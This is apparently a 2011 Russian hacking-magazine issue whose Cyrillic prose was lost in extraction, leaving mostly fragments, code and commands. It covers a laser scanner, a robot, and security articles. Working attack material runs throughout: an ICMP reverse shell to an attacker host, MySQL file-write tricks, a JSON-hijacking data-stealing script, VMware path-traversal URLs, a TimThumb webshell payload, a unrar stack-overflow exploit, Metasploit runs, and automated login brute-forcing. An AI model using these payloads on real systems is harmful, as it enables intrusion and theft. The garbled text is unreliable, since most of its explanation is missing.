. DAVID-laserscanner (www.david-laserscanner.com) TriAngles
(www.intricad.com), ,
.
:
, .
.
, .
DAVID-laserscanner ,
.
199 229 ,
. . , . ,
, DAVID,
, ,
. .

-
,
,
-.
, , .
,
. ,
640 480.
:
(
),
,
.
USB- WDM- (. ., ,
DAVID). - ,
DAVID ,
. Logitech
WebCam Pro 9000 with cam holder,
. Logitech 270 35 .

10 /153/ 2011


, .
, . !
,
,
. ,
,
. .
,
. , ,
. ,
( ).

. 650
5 , 25 .
, ,
(, www.greenlaser.com.ua). ( 20 ) ,
. , .
,
, /.
9 : +, - : ,
, , .

.
,

,
. ,
,

,
90. DAVID
PDF CDR , Calibpoints_Scale30_DIN_A4.pdf. ,
CDR CorelDraw. ,
,
. . ,
.
4. .
, ,
. ,
.
. , ,
. :
, . : 90,

. , .

.
,
,
.
.
,
, .

035

PC ZONE


?
. :
. ,
. ,
. DAVID
, , . .
,
.

,
. -
, .
.
. ,
,
. DAVID-laserscanner.
-, : , .
. .

, ,
.
-, .
,
!


. . ,
: , , . .
! .
. , :
, .
.
(
- ).
(. . ) ,
, .
: .
,
. , ,
.

.
. - ,
- .
: ,
! , .
, , , ,
. . -,

036


$500, DAVID-LASERSCANNER
STARTER-KIT, ,
- LOGITECH PRO 9000,
, USB- .

10 /153/ 2011

3D- $30

3D-

,
( ). -, -
. - ,
, .
.

, .
() ,
, (
). :
.
, ,
45. ,
.
: ,
.


, .
, .

. .
ZBrush Mudbox
. !
TriAngles ,
DAVID. ? , . .
.
.

4-


.
, , .
. :
. , . DAVID
,
. ,

3D-


3D- ( ).
,
. ? , (
)
. .
, :
.
. - ,
.

10 /153/ 2011

3D-,
, . , . , (
)
USB- c CCD-, ( ), :
.
, ,
. z

037

PHREAKING

(po.kumekay.com)



300
Skype- , .
, 5000 ,
. , 300 !
?
- . ,
, .
, ,
, .
, , ,
. , , -, :
, , (, ), , .
.

, , .
-
( 12 , 7 , 600 .) ,
1015 ( ).
.
Segway. ,
.

. (35
) .
.

038


.
, . , 500700
. .
13 , 2,5
( ).
130 .
. ,
-
.
.
,
-, (. . ,
, ;
). ,
, , , .
,
(600700 ) , : 12- .
, .
:
,
, .
,
. , ,
.
- . ,

(ruby)

xmpp

(ruby)

serial

Arduino

10 /153/ 2011

. - .

, .
, .
.
, ,
.
100 ,
: .
,
, , , , , . ,
.

Q1, Q2

IRL530

R1, R2

130

R3, R4

100k

U$1, U$2

MOTOR


,
. ,
110 ,
,
,
.
( 4),
. , : , , , ,
. . , -
-.


. ,
: , WiFi 3G-, ,
XMPP ( GTalk) ,
.
OM-, Arduino.
, . .
10 ,
2 .
( ),
.
( 1), ,
.
, ( ).

, ,
.
(Q1, Q2) IRL530. , 5 ,
. ,
-. -
, , ,
. , . , ,
,
, , ,
. , ,
: . ,

10 /153/ 2011

1.

C13

10nF

C1-C3,C5-C10

100uF/25V

C4,C11, C12

100uF/25V

D13

1N4007

D1-D13

1N5819

JP1

Data

Q1-Q8

IRF1310

R1-R8

360R

U$1-U$4

IR2110N

X1

X2

X3

2. H-

039

PHREAKING

RFP30N06LE Fairchild,
3,3 .
,
H- ( 2),
MOSFET , IRF1310 42 .
4- ,
.
,
IR2110. ,
.
( 2),
. , .
, , , ,
.
- (
goo.gl/r1sr).
,
Arduino. 10 11 . .
.


.
. Skype Google,
,
Ubuntu. ,
.
. PC Arduino.
Ruby Ubuntu (
, Windows,
Cygwin). :

. 0 255, . , 255
, 0 .

require 'rubygems'
require 'xmpp4r-simple'
require 'serialport'
#
sp = SerialPort.new "/dev/ttyUSB0", 9600
#
im = Jabber::Simple.new("ww@mail.com", "pass")
# Jabber
while(true) do
#
im.received_messages do |message|
#
puts "#{message.body}"
a,b = message.body.split(' ')
# , -
sp.write a.to_i.chr+b.to_i.chr
#
#
end
sleep 0.05
#
end

ruby telebot.server.rb

sudo apt-get install ruby rubygems


,
Jabber:
sudo gem install xmpp4r-simple
, , :
sudo gem install xmpp4r-simple ruby-serialport

Jabber

040


,
.
. , RBot'a (teledroids.ru)

,
.

:
(robot-war.ru)
(glavbot.ru)

RBot

10 /153/ 2011

,
.
Arduino
int lPin = 10; //
int rPin = 11; //
int command = 0;
void setup() {
Serial.begin(9600); }
void loop() {
if (Serial.available() > 0) {
//
command = Serial.read();
//
analogWrite(rPin, command);
Serial.println(command, DEC);
//
command = Serial.read();
//
analogWrite(lPin, command);
Serial.println(command, DEC);
// 300
delay(300);}
//
//
analogWrite(rPin, 0);
analogWrite(lPin, 0); }

,
. , , , ,

.
, 1 3,
. ,

Enter.

require 'rubygems'
require 'xmpp4r-simple'
@a = 255/3
@im = Jabber::Simple.new("qq@mail.com", "pass")
@recipient="ww@mail.com"
# Enter
def read_char
begin
#
old_state = 'stty -g'
system "stty raw -echo"
c = STDIN.getc.chr
if(c=="\e")
extra_thread = Thread.new{
c = c + STDIN.getc.chr
c = c + STDIN.getc.chr
}
extra_thread.join(0.00001)
extra_thread.kill
end
rescue => ex
puts "#{ex.class}: #{ex.message}"
puts ex.backtrace
ensure
system "stty #{old_state}"
end
return c
#

10 /153/ 2011


, ,
( ,
) , , , . ,
, ,
, DIP-,
Sparkfun ( sparkfun.com/products/9059
sparkfun.com/products/844).
ArduRoller (github.com/fasaxc/ArduRoller) .

end
#
def show_single_key
c = read_char
case c
#
when "\e[A"
puts ""
@im.deliver(@recipient, @a.to_s+" "+@a.to_s)
when "\e[C"
puts ""
@im.deliver(@recipient, "0 "+@a.to_s)
when "\e[D"
puts ""
@im.deliver(@recipient, @a.to_s+" 0")
# 1 3
when "1"
puts "1"
@a = 255/3
when "2"
puts "2"
@a = 255*2/3
when "3"
puts "3"
@a = 255
# esc
when "\e"
Process.exit
end
end
#
show_single_key while(true)
! .

.

?
? ,
100 , ,
. !
!
, , .
ROS (ros.org/wiki/),

WillowGarage PR2 (goo.gl/SDr8) RBot (rbot.ru). z

041

/ EASY HACK

GreenDog , DSecRG.ru (agrrrdog@gmail.com, twitter.com/antyurin)

EASY
HACK

, -
TCP- back connect. ,
: - , TCP- ?
,
.
DNS- , (
147- ). , ICMP, , Bernardo Damele Nico: reverse icmp
shell. , ( )
ICMP echo request ( ping).
, ICMP echo-reply-
.
, , . -,

back connect,
. -, ,
: raw
socket. , .

icmpsh.exe -t ha.ck.er.ip
, .
,
.

./icmpsh_m.py ha.ck.er.ip vi.ct.im.ip
IP ,
.
Windows, , -, .
, XP, 7-.
Perl, C,
Python. , . ,

ICMP-ping-:
sysctl -w net.ipv4.icmp_echo_ignore_all=1

ICMP-: ,

042

, sqlmap.
, :
ICMP-.
,
.

10 /153/ 2011

EASY HACK

MYSQL

,
,
- . ,
.
. , : -
, .

. , .
Load_File().
FILE CREATE TABLE. ,
, LocalSystem.
,
, :
SELECT HEX(LOAD_FILE(C:/test.exe)) INTO DUMPFILE 'c:/windows/
temp/blablabla';
CREATE TABLE readtest(data longtext);
LOAD DATA INFILE 'c:/windows/temp/blablabla' INTO TABLE
readtest FIELD TERMINATED BY '\\' (data);
.
. , .

longtext.
. , . .
, FILE,
UPDATE, INSERT, CREATE TABLE. , SELECT INTO DUMPFILE. ,
,
, ,
, . ,
, . -, hex-
1024 . -, :
CREATE TABLE writetest(datalongblog);
INSERT INTO writetest(data) VALUES (0x4d5a90..610000);
UPDATE writetest SET data= CONCAT (data,0xaa27000000000000);
[];
SELECT data FROM writetest INTO DUMPFILE 'C:/windows/Temp/test.exe';

.
hex-.
hex-. , ,
exe . (BlackHat 2009, goo.gl/23808).

FRAMEBUSTING-

XSS-track (goo.gl/lXmF8) XSS-. ,


, .
, XSS-: , ,
JavaScript, , .
- ,
.
, .
JavaScript:
<script type="text/javascript">
if(top != self) top.location.replace(location);
</script>

, allow-top-navigation ,

. .
framebusting-
: HTML5- , . ,
.

IE8/9 XSS.
, framebusting,
JavaScipt (XSS). IE,
XSS, (,
), framebuster . , XSS-. , (stored XSS reflected, ,
IE-),
IE. , , .

.
, ,
. - .
, ,
.
sandbox, HTML5 .
<iframe src=?http://www.victim.com? sandbox="allow-same-origin
allow-forms allow-scripts"></iframe>
, .
allow-scripts, . -

10 /153/ 2011

043

/ EASY HACK

XSS

Shell of the Future. ,


, .
HTML5 , COR Cross-origin requests.
-
, .
HTTP-. :
1. XSS.
2. XSS (Shell of the Future).
3. COR.
4. R.
5. COR- .
6. R .
.
JavaScript.
http-.
.
.
framebusting, HttpOnly/
Secure. . , www.andlabs.org/
tools/sotf/sotf.html.

Shell of the Future:

, JSON
Hijacking. ,
,
. , : JSON
, JavaScript
Ajax-. JSON Hijacking
, CSRF (Cross-site request forgery),
.
, , http://
server/secret-info.json GET- (),
, :
["aaaa", "password"]
CSRF , , , ,
:
<script src=http://server/secret-info.json>

JSON-.
JavaScript, JSON, , ,
. ?
, JavaScript
:
<script type="text/javascript">
var secrets;
Array = function() {
secrets = this;

044

};
</script>
JSON
, . .
// GET- JSON
<script src="http://server/secret-info.json"
type="text/javascript"></script>
// ( )
<script type="text/javascript">
var yourData = '';
var i = -1;
while(secrets[++i]) {
yourData += secrets[i] + ' ';
}
alert(': ' + yourData);
</script>
.
, .
, ,
,
. Gmail,
2006 :
.
, :
Array.
, , Firefox 2.0.

10 /153/ 2011

EASY HACK

VMWARE

, ,
. ,

. :
,
, ,
. ,
- .
, . , , , ,
. ,

. : , .
: - Immunity,
.
. ? , .
, . , ,
., vSphere, ESX, ESXi, vCenter,
Server. :
intitle:"Welcome to Vmware ESX"
intitle:"VMware Management Interface:" inurl:"vmware/en/"

( 2009 , ESX 3.5),


CVE-2009-3733.
:
https://victim.com/sdk/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E
%2E/etc/passwd
?
, . /etc/
vmware/hostd/vmInventory.xml
vmx.
,
vCenter
. web- jetty 6.1.16 :
https://victim.com/vci/downloads/health.xml/%3F/../../../../../..
/../../../any_file
(vpxd-profiler-*),
vCenter .
vmware_
session_rider.rb, VASTO.
:
1. .
2. MSF:

: 902/903,
vmware- http - vmware httpd.
goo.gl/NdMfy.
?
, . VMware
.
nmap. , : 443-
SOAP-, .
, , ,
. -, VASTO.
Metasploit Framework
, BlackHat 2010 (vasto.nibblesec.org). .
.
:
%msframework%\msf3\modules\auxiliary\vasto ( ). ,

3. vCenter (VI client) : 127.0.0.1:9999.


4. .

ESX 4

VMware

10 /153/ 2011

use auxiliary/vasto/vmware_session_rider
set RHOSTvictim.com
set SOAPID 04D40C81-564E-4511-AC0D-D57FFA571E4E
( )
run

, , vCenter, .
( 5 ), VASTO
vmware_
autopwn.rb.
VMware, , .

045

iv (ivinside.blogspot.com)
pikofarad (115612, . , .1)

, WordPress,
HP,

Firefox, , ()
.


WordPress TimThumb

CVSSV2

7.5
(AV:N/AC:L/AU:N/C:P/I:P/A:P)

BRIEF
TinThumb WordPress
- timthumb.php, .
40 ,
. ,
,
! - ,
PHP- . , , .
EXPLOIT
, :
http://www.target.tld/wp-content/themes/THEME/timthumb.
php?src=http://blogger.com.evildomain.tld/pocfile.php

046

10 /153/ 2011

timthumb.php

THEME , .
, . -, , .
:
$allowedSites = array (
'flickr.com',
'picasa.com',
'blogger.com',
'wordpress.com',
'img.youtube.com',
'upload.wikimedia.org',
'photobucket.com',
);
, strpos
, - ,
URL , . ,
.
, ,
, - PHP-.
,
- , . http://goo.gl/
We45j, GIF-
35 . , 35 , (!)
PHP- , -, . PoC
:
\x47\x49\x46\x38\x39\x61\x01\x00\x01\x00\x80\x00\x00
\xFF\xFF\xFF\x00\x00\x00\x21\xF9\x04\x01\x00\x00\x00
\x00\x2C\x00\x00\x00\x00\x01\x00\x01\x00\x00\x02\x02
\x44\x01\x00\x3B\x00\x3C\x3F\x70\x68\x70\x20\x40\x65

\x76\x61\x6C\x28\x24\x5F\x47\x45\x54\x5B\x27\x63\x6D
\x64\x27\x5D\x29\x3B\x20\x3F\x3E\x00

GIF- <?php @eval($_
GET['cmd']) ?>. timthumb.php
/wp-content/themes/THEME/cache/
, , . : www.exploit-db.com/exploits/17602.
TARGETS
WordPress TimThumb Plugin 1.* 1.32
SOLUTION
. -, : 1.34 .
-, , ,
. -,
,
$allowedSites = array();. , ,
.
, WordPress,
, :
1. SSH.
2. WordPress.
3. grep -r base64_decode *.
, , , .
4. /tmp txt php.


HP LaserJet Pxxxx Series

CVSSV2

7.8

(AV:N/AC:L/Au:N/C:C/I:N/A:N)
BRIEF
: Metasploit Framework

. LaserJet HewlettPackard. , , . ,
PJL (Printer Job Language).
JetDirect-
9100 ,
PJL.

Firefox 3.6.16

10 /153/ 2011

EXPLOIT
MSF hp_
printer_pjl_traversal hp_printer_pjl_cmd.

047

heap spraying

.
:
RHOST .
RPATH .
RPORT .
!r FILE ,
/, ..
. , ,
, -
( LynxOS), /etc/passwd, ,
/bin/dlsh.
MSF PJL . RHOST RPORT,
CMD ,
. /etc/
passwd, ,
http://goo.gl/UKesp.

OnChannelRedirect, nsIChannelEventSink,
. ,
OBJECT.
metasploit heap spray ROP- DEP
Windows XP SP3.
EXPLOIT
,
. . use-after-free
:

TARGETS
HP LaserJet Pxxxx Series, , LaserJet .
SOLUTION
.

Firefox 3.6.16 OBJECT mChannel Remote Code


Execution Exploit (DEP bypass)

CVSSV2

10.0

(AV:N/AC:L/Au:N/C:C/I:C/A:C)
BRIEF
: 5 2011 , : Rh0, CVE: CVE-2011-0065.
use-after-free Mozilla Firefox 3.6.16, , , regenrecht, metasploit Rh0.
, mChannel, OBJECT,
HP,

048

10 /153/ 2011

PJL 309 WEP !

;
, .

base/src/nsObjectLoadingContent.h)
.

data OBJECT.
LoadObject OBJECT.

, , - ,
.

. ,
.
, ,
, ++,
.
,
.
content/base/src/nsObjectLoadingContent.cpp:
nsObjectLoadingContent::OnChannelRedirect(
nsIChannel *aOldChannel,
nsIChannel *aNewChannel,
PRUint32 aFlags)
{
// If we're already busy with a new load, cancel the redirect
if (aOldChannel != mChannel) {
return NS_BINDING_ABORTED;
}
if (mClassifier) {
mClassifier->OnRedirect(aOldChannel, aNewChannel);
}
mChannel = aNewChannel;
return NS_OK;
}
OnChannelRedirect,
, OBJECT (
nsIChannelEventSink) mChannel.
, mChannel ( content/

10 /153/ 2011

nsObjectLoadingContent::LoadObject(nsIURI* aURI,
PRBool aNotify,
const nsCString& aTypeHint,
PRBool aForceLoad)
{
...
if (mChannel) {
...
mChannel->Cancel(NS_BINDING_ABORTED);
...
}
...
}
metasploit, , heap spraying,
. heap spraying , , , , . 0x7fffffff,
,
ring3 .
heap spraying
, , , , . ,
: nop- + shellcode.
,

, , , , ,
. - nop- . heap
spraying

049

unrar <= 3.93

, JS-,
, ,
.
MSF
: metasploit,
, Firefox :
msf# exploit(mozilla_mchannel) > set PAYLOAD windows/exec
PAYLOAD => windows/exec
msf# exploit(mozilla_mchannel) > set CMD calc.exe
CMD => calc.exe
msf# exploit(mozilla_mchannel) > exploit
[*] Exploit running as background job.
[*] Using URL: http://0.0.0.0:8080/cnGnlIbrNQYE
[*] Local IP: http://192.168.0.23:8080/cnGnlIbrNQYE
[*] Server started.
TARGETS
Mozilla Firefox 3.6.16
SOLUTION
, .

050

Unrar 3.9.3 Local Stack


Overflow Exploit

CVSSV2

7.2

(AV:L/AC:L/Au:N/C:C/I:C/A:C)
BRIEF
: 5 2011 , : ZadYree, CVE: N/A.
Unrar *nix- ,
, , RAR.
, ZadYree,
, .
EXPLOIT
:
import sys
from struct import *
buf = '-' + '3lrvs'*817 + 'AAA' + pack('I',0x8070197)
shellcode = "\xcc\xcc\xcc\xcc\xaa\xaa\xaa\xaa\xbb\xbb\xbb\xbb\
xcc\xcc\xcc\xcc\xdd\xdd\xdd\xdd"

10 /153/ 2011


,


f = open('expl_option', 'wb')
f.write(buf + shellcode + '\012')
f.close()
, ,
, 0x8070197 .
.
esp, jmp esp ( ,
), ,
jmp esp.
unrar.
(^-^) objdump -D /usr/bin/unrar |
806febf: ff e4
jmp
8070197: ff e4
jmp
8070317: ff e4
jmp
807038f: ff e4
jmp
8070527: ff e4
jmp

grep "ff e4" | grep jmp


*%esp
*%esp
*%esp
*%esp
*%esp

, :
(^-^) gdb --args unrar 'cat expl_option '
(no debugging symbols found)
(gdb) r
Starting program: /usr/bin/unrar -3lrvs3lrvs3lrvs...s3lrvsAA...
...
ERROR: Unknown option: 3lrvs3lrvs3lrvs...3lrvsAA...
Program received signal SIGTRAP, Trace/breakpoint trap.
0xbfab6405 in ?? ()
1: x/i $pc
0xbfab6405: int3
(gdb) x/20x $eip-1
0xbfab6404: 0xcccccccc 0xaaaaaaaa 0xbbbbbbbb 0xcccccccc
0xbfab6414: 0xdddddddd 0xbfab6400 0x08067f22 0x0806ec60
0xbfab6424: 0xbfabfdfa 0x08048b97 0xb7483a8c 0x00000000
0xbfab6434: 0x00000000 0xbfab6a98 0x080680e7 0xbfab7f98
0xbfab6444: 0xbfabfdfa 0x08048c77 0xb7483a8c 0x08048460
(gdb)
.
.
TARGETS XXX
unrar <= 3.93
SOLUTION
, , , .

unrar, . z

10 /153/ 2011

zyx2145 , @Kaspersky Lab


touzoku , @

DEFCONCTF

-
-
: BlackHat 2011 DEFCON 19.

,
Capture The Flag (CTF),
.

-, .

052

WWW

0X01. CTF?

:
Hackerdom:
www.hackerdom.ru;
Leet More:
leetmore.ctf.su;
SiBears:
sibears.ru;
Smoked Chicken:
smokedchicken.org.

Capture the Flag ,


-.
, , ,
,
. . , , ,
. CTF:
. , ,
CTF .
, UCSB
iCTF, NuitDuHack, plaidCTF, RuCTFE . DEFCON CTF 1996 .
, , .
4- .
, ( iCTF), -,
POSTECH-Pohang, , , . .

10 /153/ 2011

DEFCON CTF

0X02. DEFCON CTF PREQUALS


Defcon CTF Jeopardy .
.
2530 ,
reverse engineering, forensics, binary exploitation, packet analysis
. .
,
. ,
,
.
, .
700 ,
280. , Team IV, :
Hackerdom ;
Leet More - , ;
SiBears ;
Smoked Chicken - .
,
DEFCON CTF .
, 4-
12 , . .
GRAB 100
- SPDY
5932 . , apache,
SPDY ( HTTP Google). /cgi-bin/
http://pwn583.ddtek.biz:5932/cgi-bin/
phf?Qalias=%0Acat%20/home/Tkf6zKZd/key. ( key). : http://pwn583.ddtek.biz:5932/
cgi-bin/phf?Qalias=%0Acat%20/home/Tkf6zKZd/k*. :
that's fast enough now go take a rest.
FORENSICS 200
NTFS
50
NTFS . MBR , .
X-Ways Forensics, ,
100 dir**, 220
. 21 978 , ,
([0-9a-f]\0{24}){40}.
ntfswalk, \
dir60\key50883. ,
$MFT NTFS- c 110h,
NTFS
100h.
110h-
X-Ways Forensics, (
), ,
, . ,
NTFS 80h,
.
, , NTFS. ,
(
). , : 47a96fac9edb95e641
e835e21ce800934d4c8f7e.

10 /153/ 2011

PWTENT PWNABLES 500



, upload_
new_record class01 class02
. class_02::copy_buffer , 24 .
void class_02::copy_buffer(class_02 * this, char * buffer)
{
unsigned int i;
for (i = 0; i <= 248; + + i) this->buffer[i] = buffer[i];
}
, buffer_len class_count, dump_obj,
,
buffer_len. , , , hash_str rb_tree_item.
view record, , rb_tree_item.
rb_tree_item,
. vftable,
, ,
. .
BINARY L33TNESS 500
PE-
, :
CloseHandle;
HeapAlloc;
memset.
,
, , PEB OEP.
.
:
NtQueryInformationProcess with (push 1eh ; ProcessDebugObjectHandle);
Rdtsc check;

053


0X03. . CTF

CREDITS
IV ( , ),
,
: - , -
, - .

,
, .

,
. ,
, , ,
, jail.
. .
.
,
.
, . ,
Rio, , :
- .
DEFCON CTF,
. ? ,
sheepfucking,
, . ,

,
?

NtSetInformationThread with (push 11h ; ThreadHideFromDebugger).


, ,
, .
,
, .
,
.
.
,
. , ,
: 080052000800520008005200080052000800520008005
2000800520008005200. , : 2FE3903DF19E4B01AC590FBA67
1DC8752BD68339E49147F29F5502AD6310BB71.

054

10 /153/ 2011

DEFCON CTF


14
. DEFCON CTF
Binjitsu ( binary + -), .
ELF .
, -,
. :
.
, -
.
, .

: astle
: 7629
:
EOF\n.
/tmp/castleXXXXXXXX, XXXXXXXX
. castle stdin, stdout stderr
/usr/local/bin/sandy
-o <IPv6> -d -s /tmp/castleXXXXXXXX, IPv6
, .
: sandy.
: . sandy.
: Bunny
: 15323
:
srand(time(0)) (max_size) 5
34.
(rand_port),
1024 65 534,
(bind+listen).
, 1 12 .
max_size .
: , max_size 34 ,
haystack 12
. . -,
, ,
1024 65 534. , seed

time(0), . -,
, ,
. ,
max_size , ret-
haystack, ,
,
, .
:
. , ,
- ,
. , .
: Hiver
: 44366
: :
4 , .
, 10 -.
key
. ,
.
10 .
- ,
,
.
: ,
,
.
: , ,
,
0 , .
, , .

10 /153/ 2011

055

CTF?
The UCSB iCTF
ictf.cs.ucsb.edu
,
. ,
, , 2008 . ,
,
.
CODEGATE CTF
www.codegate.org
.
34 CTF,
. CODEGATE CTF,
,
task-based-.
RUCTFE
www.ructf.org
Hackerdom
, CTF CTF . 2007 .
RuCTF.
2009 . , ,
.
plaidCTF
www.plaidctf.com
PPP -,
2009 ., .
,
.

(gameboard) .
PHD CTF
phdays.ru/ctf_general.asp
Positive Hack Days CTF ,
2011 .
, , .

,

,
,


056

, (
)
20 .
, . .

.
, - .
CTF ,
, LAN- (
), .
, $300
, . .
. ,
. , .
, ICMPv6-. , IPv6-, , World IPv6 Day. ,
IPv6.
.
FreeBSD 8.2, Jail. ,
Jail FreeBSD, - . ,
Jail, .
Jail . ,
, ,
. :
,

, , ,
, ,
, .
/
-.
, .
, ,
100%- .
, , . ,
.

10 /153/ 2011

DEFCON CTF

: Forgetu
: 3128
: .
-
, ,
. : ,
0xB33007D3 (
, ).
0xFC1BE02A, .

127 , .
: ,


. -
(data) 128 ,
( RacvDataFromSocket).
: ,
,
.

0X04.
,

. ,
. CTF
. , , ,
- , rm -rf
/, . tomato
root tomato,
tomator.
, root . ,
, , , .
lollersk8terz Jail, -.
, -
,
, .
, , -
. PLUS@Postech , ssh
. DEFCON
, .

0X05. WHAT HAPPENS IN VEGAS STAYS IN VEGAS


29- Bellagio
after party c
. ,
, 15 000
Black Hat DEFCON ,
. , CTF, : ,
RuCTF, , Leet More CTF, CITCTF
. ,
,
! ,
, , - .
. z

10 /153/ 2011

: Sandy
:
: Sandy
.
: castle ,
,
. . , fopen

.
: Fopen ,
fprintf,
.
: Sheepster
: 5775
:
. ,
: Welcome to the ddtek blog.

, .
:
zzyzxrd. , (flag),
fputs fprintf
. x`lXPPTH@8
(
xevgdirkhe),
fputs. , ,
. ,
.
:
hiver,
. ,
, ,
,
. ,
.
, .

057

.
DDoS-
. 1999 .

,
. ,
. ,
, , DDoS, ,
. ,

.
, .
,
,
( -
). , . ,
.
, Malware
as a Service. -
,
, . ,
.
, Zbot (Zeus), Spyeye, Mariposa, Black Energy, ButterFly,
Reptile. ,

058

10 /153/ 2011

- . , ,
, , , ,
.
,
, , . , ,
Microsoft, .

MICROSOFT VS.

. ?
, , :
Rustock, 80 % .
Coreflood, , $100 .
Waledac, 1,5 -
. FTP.

, - , Microsoft
.
SDL,

( , ). ,
, , .
.

. Digital Crime
Unit, Microsoft Security Response Center, Microsoft Malware Protection
Center,Trust worth Computing,
. Microsoft

,
.

( ) , Command & Control,
C&C.
. IRC. , P2P- ,
.

,
Facebook. ,
:

10 /153/ 2011

059

&C-.
DDoS &C-.
, C&C-.
DNS-, C&C.
IP .
.
.

, ,
.
. , Rustock Coreflood . &C-
.

.
Waledac ,
.

,
, Windows -.
Linux/Unix Psyb0t, Chuck Norris, .
, NAS .
,
Linux .

,
. 2009 ,

.

WALEDAC:
Waledac .
277 . ,
. ,
P2P-.
, . Waledac , . ,
, NAT
80 , , ()
, .
. - ,
100 , ,
P2P .
- fast flux
DNS. ,

Waledac

060

Microsoft Waledac

10 /153/ 2011

-,
.
-
.
. , ,
,
80- , .
,
.
- C&C.

ICANN TRO (temporary


restraining order) 28 .
, DNS-
.
Microsoft Pfizer. Microsoft
Pfizer.
Microsoft
, ,
. ,
, .
,
. Microsoft
, .

Microsoft (bit.ly/rlDUDA).
DNS
Microsoft. DNS-
Microsoft. ,
, ,
. , Microsoft
Waledac, , C

, Microsoft Security Essential Malicious
Software Removal Tool.

WALEDAC:
,
:
1. p2p- .
2. DNS/HTTP-.
3. C&C-.
P2P-.
,
, ,
20 ,
, .
,
, P2P.
-
Microsoft.
P2P-
fast flux DNS.
,
.
,
. DNS ICANN Uniform Domain-Name
Dispute-Resolution Policy .
, ,
DNS-,
.

10 /153/ 2011

Waldac.
, Microsoft .
$250 000 , ,
, Rustock (bit.ly/oR7x88). , .
, Microsoft
, . z

061

qbz (cayd@yandex.ru)

LINKS
bit.ly/qV15Z8

cURL.
bit.ly/oMBmcW

LiveHTTPHeaders
Mozilla Firefox.

-



.



mamba.ru slil.ru.

DVD

,

slil.ru.



.

HTML-,
slil.ru

,
-
: , ,
.
, , .
: , . ,
,
.
, :
CAPTCHA;
(cookie, );
;
JavaScript-;
;
flash;
, .

,
, :
.

, , .
, slil.ru.
, -
, ,
, . ,
:
.
PHP.
cURL.
LiveHTTPHeaders Mozilla Firefox.

062

10 /153/ 2011

, . ,
. ,
. HTML-
.
.
:
1. file_get_contents().
PHP- allow_url_fopen.
.htaccess- Apache (php_flag allow_url_
fopen on). ,
PHP
HTTP-. :
$settings = array('http' => array('method' => 'GET', 'header' =>
"User-Agent: []\r\n".
"Accept: text/xml,application/xml,application/
xhtml+xml;q=0.5\r\n".
"Accept-Language: en-us,en;q=0.5\r\n".
"Accept-Encoding: gzip,deflate\r\n".
"Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7"));
$settings = stream_context_create($settings);
$html = file_get_contents('http://url.tld/', NULL, $settings);
2. (fsockopen() ,
).
3. cURL.

LiveHTTPHeaders

.
.
.
,
( cURL
file_get_contents).

,
CAPTCHA



/.

.
,

5 %.
API
.

-,

: 90 %.

.
XSS-
.
XSS
,

.

, .

10 /153/ 2011

,

.
-

.


.

.

, ,
,
.

- ,

.
.
cookie-,
.

,
.


JavaScript-
,
,
SSL, , ,

.
PHP cURL,
, .
JavaScript-,

(
JavaScript:
)
js-,
,
, .

HTML- .
Opera
DragonFly
LiveHTTPHeaders.
,
POST-, GET- COOKIE-

.
.




,

. ,
, 5000 .
,
, CMS
.

:
IP-
.
,
1000
,
20- ? socks- proxy-.
IP-, , 100 IP-. ,
100 20, 2000
,
.

063


$curl = curl_init();
$head = array(
'Host: slil.ru',
'User-Agent: []',
'Accept: text/xml,application/xml,application/xhtml+xml;q=0.5',
'Accept-Language: en-us,en;q=0.5',
'Accept-Encoding: gzip,deflate',
'Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7',
'Keep-Alive: 300',
'Connection: keep-alive'
);
// , LiveHTTPHeaders
curl_setopt($curl,
curl_setopt($curl,
curl_setopt($curl,
curl_setopt($curl,

CURLOPT_URL, 'http://slil.ru/31402491');
CURLOPT_RETURNTRANSFER, true);
CURLOPT_HTTPHEADER, $head);
CURLOPT_ENCODING, 'gzip,deflate');

slil.ru

$out = curl_exec($curl); //
curl_close($curl); //

17 ,
slil.ru/31402491 $out.
, :

cURL, , . . Mozilla Firefox


LiveHTTPHeaders.
slil.ru/31402491 .
, .
:

$filedata = explode('<p align="center">', $out);


$filedata = explode('</p>', $filedata[1]);
list($filename, $filesize) = explode('&nbsp;&nbsp;&nbsp;',
trim(strip_tags($filedata[0])));
$temp_link = explode('var l1nk=\'', $cResult);
$temp_link = explode('\';', $temp_link[1]);
$temp_link = trim(str_replace("'+'", '', $temp_link[0]));
$data = array('name' => $filename, 'size' => $filesize,
'link' => $temp_link);

GET /31402491 HTTP/1.1


Host: slil.ru
User-Agent: []
Accept: text/xml,application/xml,application/xhtml+xml;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive

,
.

? cURL. ,
. , :

, ,
.


function genLinks($from, $to)
{

3


,

. ,

,

.

:

064

(antigate.com)
, ,
.

JPG, GIF PNG.

1 . 1000 .
10 % , ,
- .

(captchabot.com) , .

(80 %),
API. 30
, 30 .

,
.

Death by Captcha
(deathbycaptcha.com) ,
.
1,39 . 1000
.
17
90 % .
API.

10 /153/ 2011

$i = 0; $links = array();
for ($i = 0; $i <= ($to $from); $i++)
{
$links[] = 'http://slil.ru/'.($from+$i);
}
return $links;
}
$links = genLinks(31402491, 31402591);
100 slil.ru 31402491 31402591
. .
, .
cURL :
1. ,
.
2. curl_multi_exec,
.
3. curl_
multi_getcontent.

parseLinks() :

clickUrl=http%3A%2F%2Fmamba.ru%2Ftips%2F%3Ftip%3DLogin&
target=&login_captcha=&login=xxx&password=x1x2x3&
VAnketaId=0&RedirectBack=http%253A%252F%252Fmamba.
ru%252Findex.phtml%253F
API mamba.ru/ajax/login.phtml?XForm=Login.


. ,
, cookie. , , POST.
.

PHP + cURL.
API , .
:
{"t":"0000000000000","a":00000000,"s":1,"e":0,"d":[],"r":0,"XFor
ms":{"Login":{"found":"\u041d\u0435\u0432\u0435\u0440\u043d\
u043e\u0443\u043a\u0430\u0437\u0430\u043d \u043b\u043e\u0433\
u0438\u043d\u0438\u043b\u0438 \u043f\u0430\u0440\u043e\u043b\
u044c"}}}

$info = parseLinks(genLinks(31402491, 31402591));


:
, - , 1000 , slil.ru, 31402491
31402591. . , , , ,
. , ,
, .



(www.mamba.ru).
, :
1. .
2. .
3. , , false, true.
. , .
, , ,
.
, :
- ,
Ajax API.
, html-,
, 100300
API, . ,
API.
API. html JavaScript-, , ,
LiveHTTPHeaders.
,
, ,
/ :
POST /ajax/login.phtml?XForm=Login HTTP/1.1
Host: mamba.ru
...
